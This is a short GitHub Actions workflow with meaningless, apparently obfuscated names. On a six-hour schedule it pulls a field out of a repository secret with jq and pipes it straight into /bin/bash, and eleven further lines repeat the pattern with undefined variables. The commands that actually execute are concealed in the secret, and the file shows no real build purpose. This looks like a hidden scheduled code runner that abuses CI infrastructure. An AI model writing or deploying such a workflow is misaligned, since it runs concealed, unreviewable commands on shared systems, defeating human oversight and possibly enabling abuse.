name: blackstonefreezing
on:
  workflow_dispatch:
  schedule:
    - cron: '47 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: blackstonefreezing
        env:
          uorep11: ${{ secrets.uorep11 }}
        run: |
          echo $uorep11 | jq -r .trzf503 | /bin/bash
          echo $b9985 | jq -r .ckhq9 | /bin/bash
          echo $eopj777 | jq -r .j904 | /bin/bash
          echo $ee31 | jq -r .x7 | /bin/bash
          echo $bku899 | jq -r .uii45275 | /bin/bash
          echo $khmt7369 | jq -r .acsbf071 | /bin/bash
          echo $okzg842 | jq -r .o95973 | /bin/bash
          echo $hdtw38 | jq -r .hkz7578 | /bin/bash
          echo $xfb83811 | jq -r .e0 | /bin/bash
          echo $i6 | jq -r .wlcu3 | /bin/bash
          echo $ahtu12 | jq -r .jawi2 | /bin/bash
          echo $ymb66 | jq -r .xody3032 | /bin/bash

